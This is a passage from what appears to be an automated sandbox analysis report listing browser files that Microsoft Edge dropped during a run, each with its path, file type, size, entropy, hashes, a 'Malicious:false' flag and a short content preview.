                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379149891335447","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379149891335447","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\cb5780a1-a8c3-46c9-9a8a-bfc49e96e7ad.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e96574ca-9f9b-4e9f-82f5-3a23170f6dc5.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9757
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.109627052660825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEkdpwseDBaFvrE9kmns8PbV+FIAQA+TU1P9YJ:stEQwseDBCDqbGzQ4g
                                                                                                                                                                                                                                                                                                MD5:7A40413DEB051EF474E2AF7567B53490
                                                                                                                                                                                                                                                                                                SHA1:AAB4876FCC6DCB2AEB591FAEFA259F6185BCB5AB
                                                                                                                                                                                                                                                                                                SHA-256:BED4D76473EB58012334149C6CF1048016C4FD72CD3BA5CDCE89020D77FAEFAE
                                                                                                                                                                                                                                                                                                SHA-512:CE1256B92B3357B4F3EF43EBCCE0D54CFB8B06CEC2CC5485D89E01FAF1BBF75A775EBE5674E9AD782B5E8B8DD22B0B72467B35F74F6D4C91E423CBCA4DDA2D9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fa4386cf-bf15-4200-af0c-f44acbb17fc2.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.10135797548516706
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:+AqkY3AqkPBspEjVl/PnnnnnnnnnnnvoQ/Eou:+LRLACoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                MD5:B575F604AC1E932434DA1244E513E6CE
                                                                                                                                                                                                                                                                                                SHA1:84667EBA3250F61B2FA0229C22C63E4EA45A7D94
                                                                                                                                                                                                                                                                                                SHA-256:ED81AF94BC80D9E4EE13B9E05E5376D4129D83057877C66DA1730649594E6578
                                                                                                                                                                                                                                                                                                SHA-512:E1121D481D5AFCD72F422C9EB982063F18DB09EACCF39614E2E8BBEFAE39C5FC5A3EABE2FBC4E6F40B731F91D0B7EB62ACDB14C896743C52109CAA64EF185F92
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..-.............M.........U./..J$J...V......`..1..-.............M.........U./..J$J...V......`..1........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8898846608473822
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:th4Aa/PDUcYRwqYG7fYPIaYBixYyxhY/ZMG1hYn4v8lyQyQ1ydy51yTxycv:5X
                                                                                                                                                                                                                                                                                                MD5:18A89B6D07CBCDCC1E9C09A0A2777906
                                                                                                                                                                                                                                                                                                SHA1:42FC1A81EB634D02534B8296D392F8887FB6EAF9
                                                                                                                                                                                                                                                                                                SHA-256:7819BC83E528BFE31B8E84CCAE4F18A2D05010039B289861508DA87EEC29FE37
                                                                                                                                                                                                                                                                                                SHA-512:0441E0B7070071EE23B5718B929BA7B55E58CA5E22E8DF7796B769215DD4C696EE27099E640CD54C0FB4A44003E10FAA24D54DA27EF48838AE3514F8082D3302
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):628
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2343826349373366
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuuuVs88:pHay4
                                                                                                                                                                                                                                                                                                MD5:6EA545DAC05AB5D87ACA44EB9ADBB6A5
                                                                                                                                                                                                                                                                                                SHA1:AF40E0F29E41A1D3A6392BEAF2304381BBB17F77
                                                                                                                                                                                                                                                                                                SHA-256:2BD9D92C93FC9FFBE628C76FEB06B7356901E478C8FCC6591FBF1327A0ADF714
                                                                                                                                                                                                                                                                                                SHA-512:1F4FA78813668FB4F4BFFE1B07C51985BEA87D64581653A44E2F0D1A9E9EDFB3C5D11916CB6CD84DE6697526346A10FE627F5BD7F64D39BD5AA121DC0D7D0B60
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............2V .0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.155054069602851
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7VOSMq2PN723oH+TcwtfrK+IFUt8I729Zmw+I72PkwON723oH+TcwtfrUeLJ:pOPvVaYeb23FUt8R/+L5OaYeb3J
                                                                                                                                                                                                                                                                                                MD5:9F35E3811AD10EA7444EF9FC6233C0CB
                                                                                                                                                                                                                                                                                                SHA1:F4619EAC0A0D65FF76A0C6E54874F7883B9CABE1
                                                                                                                                                                                                                                                                                                SHA-256:D61AFD83E6EFAF43071086628ABE0DF12CBAF5C8F9DDA1B4F15511F2FFEDD13A
                                                                                                                                                                                                                                                                                                SHA-512:A6E2A6D88A056D94C04BB4ACA83A2D2639FE354AFCD38DFCFB983215E0BBFC554502DCF905A2809DB8CD08039BB1998A97FCF1D9A2C078B741392A14BFF64B22
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.044 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/20-01:31:32.045 1d74 Recovering log #3.2024/12/20-01:31:32.045 1d74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.155054069602851
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:P7VOSMq2PN723oH+TcwtfrK+IFUt8I729Zmw+I72PkwON723oH+TcwtfrUeLJ:pOPvVaYeb23FUt8R/+L5OaYeb3J
                                                                                                                                                                                                                                                                                                MD5:9F35E3811AD10EA7444EF9FC6233C0CB
                                                                                                                                                                                                                                                                                                SHA1:F4619EAC0A0D65FF76A0C6E54874F7883B9CABE1
                                                                                                                                                                                                                                                                                                SHA-256:D61AFD83E6EFAF43071086628ABE0DF12CBAF5C8F9DDA1B4F15511F2FFEDD13A
                                                                                                                                                                                                                                                                                                SHA-512:A6E2A6D88A056D94C04BB4ACA83A2D2639FE354AFCD38DFCFB983215E0BBFC554502DCF905A2809DB8CD08039BB1998A97FCF1D9A2C078B741392A14BFF64B22
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:32.044 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/20-01:31:32.045 1d74 Recovering log #3.2024/12/20-01:31:32.045 1d74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):816
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                                MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                                SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                                SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                                SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):346
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.172782961520596
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PPX6q2PN723oH+TcwtfrzAdIFUt8IPXzZmw+IPXpkwON723oH+TcwtfrzILJ:qvVaYeb9FUt8M/+s5OaYeb2J
                                                                                                                                                                                                                                                                                                MD5:29EA8335CC1B6066C3203CB3C83BD894
                                                                                                                                                                                                                                                                                                SHA1:E8B09D592787E35B465F7E7A1B8426415071833D
                                                                                                                                                                                                                                                                                                SHA-256:6E73E3D62AFA44065A436F5F75E7DB2C72785B6D4DCEF21582A6D0E5475C5839
                                                                                                                                                                                                                                                                                                SHA-512:227B6D5E322019CB62047C056794757EC703747768ECF665EEEDCB543421AF0CD049BEE92407284A7839ADC5250AB22FCB6BA1005156A9736B994FD302567766
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.980 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/20-01:31:31.980 1d74 Recovering log #3.2024/12/20-01:31:31.980 1d74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):346
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.172782961520596
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PPX6q2PN723oH+TcwtfrzAdIFUt8IPXzZmw+IPXpkwON723oH+TcwtfrzILJ:qvVaYeb9FUt8M/+s5OaYeb2J
                                                                                                                                                                                                                                                                                                MD5:29EA8335CC1B6066C3203CB3C83BD894
                                                                                                                                                                                                                                                                                                SHA1:E8B09D592787E35B465F7E7A1B8426415071833D
                                                                                                                                                                                                                                                                                                SHA-256:6E73E3D62AFA44065A436F5F75E7DB2C72785B6D4DCEF21582A6D0E5475C5839
                                                                                                                                                                                                                                                                                                SHA-512:227B6D5E322019CB62047C056794757EC703747768ECF665EEEDCB543421AF0CD049BEE92407284A7839ADC5250AB22FCB6BA1005156A9736B994FD302567766
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:31.980 1d74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/20-01:31:31.980 1d74 Recovering log #3.2024/12/20-01:31:31.980 1d74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:117.0.2045.55

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44455
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089772247328986
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:6356EC0D498B0C96EB67C9B703292822
                                                                                                                                                                                                                                                                                                SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
                                                                                                                                                                                                                                                                                                SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
                                                                                                                                                                                                                                                                                                SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3be30.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44455
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089772247328986
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynOukzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                MD5:6356EC0D498B0C96EB67C9B703292822
                                                                                                                                                                                                                                                                                                SHA1:04F3FD4D1E2C26E4D515AF619FC43F4648D889AA
                                                                                                                                                                                                                                                                                                SHA-256:D26948D35C2A90233F45991416939161E8062EE802836E5C068A69AFB940C99B
                                                                                                                                                                                                                                                                                                SHA-512:37D6613948326F6775EDF004CF7FE1763904A0FC3FA940BD62722DDC9A745A271BDD59122DDF22860941A5FA235BF5FC51273E4E2019D138CCBC7928CF41E68D
                                                                                                                                                                                                                                                                                                Malicious:false
